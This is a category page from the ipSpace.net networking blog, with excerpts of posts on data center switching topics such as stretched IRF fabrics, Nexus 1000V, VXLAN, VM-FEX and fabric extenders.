switching « ipSpace.net blog

Monday, September 12, 2011 06:39 +0200

Long-distance IRF Fabric: Works Best in PowerPoint

HP has commissioned an IRF network test that came to absolutely astonishing conclusions: vMotion runs almost twice as fast across two links bundled in a port channel than across a single link (with the other one being blocked by STP). The test report contains one other gem, this one a result of incredible creativity of HP marketing:

For disaster recovery, switches within an IRF domain can be deployed across multiple data centers. According to HP, a single IRF domain can link switches up to 70 kilometers (43.5 miles) apart.

You know my opinions about stretched cluster… and the more down-to-earth part of HP Networking (the people writing the documentation) agrees with me.

Nexus 1000V LACP offload and the dangers of in-band control

2021-03-01: Nexus 1000v turned into abandonware long time ago, and is now officially a zombie (oops, EOL). However, the challenges they were facing with LACP offload are still worth pointing out to anyone advocating centralized control plane (stupidity formerly known as SDN).

A while ago someone sent me the following comment as part of a lengthy discussion focusing on Nexus 1000V: “My SE tells me that the latest 1000V release has rewritten the LACP code so that it operates entirely within the VEM. VSM will be out of the picture for LACP negotiations. I guess there have been problems.”

If you’re not convinced you should be running LACP between the ESX hosts and the physical switches, read this one (and this one). Ready? Let’s go.

VXLAN, OTV and LISP

Immediately after VXLAN was announced @ VMworld, the twittersphere erupted in speculations and questions, many of them focusing on how VXLAN relates to OTV and LISP, and why we might need a new encapsulation method.

VXLAN, OTV and LISP are point solutions targeting different markets. VXLAN is an IaaS infrastructure solution, OTV is an enterprise L2 DCI solution and LISP is ... whatever you want it to be.

VXLAN: MAC-over-IP-based vCloud networking

In one of my vCloud Director Networking Infrastructure rants I wrote “if they had decided to use IP encapsulation, I would have applauded.” It’s time to applaud: Cisco has just demonstrated Nexus 1000V supporting MAC-over-IP encapsulation for vCloud Director isolated networks at VMworld, solving at least some of the scalability problems MAC-in-MAC encapsulation has.

Nexus 1000V VEM will be able to (once the new release becomes available) encapsulate MAC frames generated by virtual machines residing in isolated segments into UDP packets exchanged between VEMs.

Soft Switching Might not Scale, but We Need It

Following a series of soft switching articles written by Nicira engineers (hint: they are using a similar approach as Juniper’s QFabric marketing team), Greg Ferro wrote a scathing Soft Switching Fails at Scale reply.

While I agree with many of his arguments, the sad truth is that with the current state of server infrastructure virtualization we need soft switching regardless of the hardware vendors’ claims about the benefits of 802.1Qbg (EVB/VEPA), 802.1Qbh (port extenders) or VM-FEX.

Quotes of the week

I’ve spent the last few days with a fantastic group of highly skilled networking engineers (can’t share the details, but you know who you are) discussing the topics I like most: BGP, MPLS, MPLS Traffic Engineering and IPv6 in Service Provider environment.

One of the problems we were trying to solve was a clean split of a POP into two sites, retaining redundancy without adding too much extra equipment. The strive for maximum redundancy nudged me to propose the unimaginable: layer-2 interconnect between four tightly controlled routers running BGP, but even that got shot down with a memorable quote from the senior network architect:

VM-FEX – not as convoluted as it looks

Update 2021-01-03: As far as I understand, VM-FEX died together with Cisco Nexus 1000v. I might be wrong and the zombie is still kicking...

Reading Cisco’s marketing materials, VM-FEX (the feature probably known as VN-Link before someone went on a FEX-branding spree) seems like a fantastic idea: VMs running in an ESX host are connected directly to virtual physical NICs offered by the Palo adapter and then through point-to-point virtual links to the upstream switch where you can deploy all sorts of features the virtual switch embedded in the ESX host still cannot do. As you might imagine, the reality behind the scenes is more complex.

Source MAC address spoofing DoS attack

The flooding attacks (or mishaps) on large layer-2 networks are well known and there are ample means to protect the network against them, for example storm control available on Cisco’s switches. Now imagine you change the source MAC address of every packet sent to a perfectly valid unicast destination.

Stop reinventing the wheel and look around

Building large-scale VLANs to support IaaS services is every data center designer’s nightmare and the low number of VLANs supported by some data center gear is not helping anyone. However, as Anonymous Coward pointed out in a comment to my Building a Greenfield Data Center post, service providers have been building very large (and somewhat stable) layer-2 transport networks for years. It does seem like someone is trying to reinvent the wheel (and/or sell us more gear).

VLANs used by Nexus 1000V

Chris sent me an interesting question:

Imagine L2 traffic between two VMs on different ESX hosts, both using Nexus 1000V. Will the physical switches see the traffic with source and destination MACs matching the VM’s vNICs or traffic on NX1000V “packet” VLAN between VEMs (in this case, the packet VLAN would act as a virtual backplane)?

Building a Greenfield Data Center

The following design challenge landed in my Inbox not too long ago:

My organization is the in the process of building a completely new data center from the ground up (new hardware, software, protocols ...). We will currently start with one site but may move to two for DR purposes. What DC technologies should we be looking at implementing to build a stable infrastructure that will scale and support technologies you feel will play a big role in the future?

In an ideal world, my answer would begin with “Start with the applications.”

Do we need distributed switching on Nexus 2000?

Yandy sent me an interesting question:

Is it just me or do you also see the Nexus 2000 series not having any type of distributed forwarding as a major design flaw? Cisco keeps throwing in the “it's a line-card” line, but any dumb modular switch nowadays has distributed forwarding in all its line cards.

I’m at least as annoyed as Yandy is by the lack of distributed switching in the Nexus port (oops, fabric) extender product range, but let’s focus on a different question: does it matter?

Hypervisors use promiscuous NIC mode – does it matter?

Chris Marget sent me the following interesting observation:

One of the things we learned back at the beginning of Ethernet is no longer true: hardware filtering of incoming Ethernet frames by the NICs in Ethernet hosts is gone. VMware runs its NICs in promiscuous mode. The fact that this Networking 101 level detail is no longer true kind of blows my mind.

So what exactly is going on and does it matter?

Automatic edge VLAN provisioning with VM Tracer from Arista

One of the implications of Virtual Machine (VM) mobility (as implemented by VMware’s vMotion or Microsoft’s Live Migration) is the need to have the same VLAN configured on the access ports connected to the source and the target hypervisor hosts. EVB (802.1Qbg) provides a perfect solution, but it’s questionable when it will leave the dreamland domain. In the meantime, most environments have to deploy stretched VLANs ... or you might be able to use hypervisor-aware features of your edge switches, for example VM Tracer implemented in Arista EOS.

VN-Tag/802.1Qbh basics

A few years ago Cisco introduced an interesting concept to the data center networking: fabric extenders, devices acting like remote linecards of a central switch (Juniper’s “revolutionary” QFabric looks very similar from a distance; the only major difference seems to be local switching in the QF/Nodes). Cisco’s proprietary technology used in its FEX products became the basis for 802.1Qbh, an IEEE draft that is supposed to standardize the port extender architecture.

If you’re not familiar with the FEX products, read my “Port or Fabric Extenders?” article before continuing ... and disregard most of what it says about 802.1Qbh.

Category: switching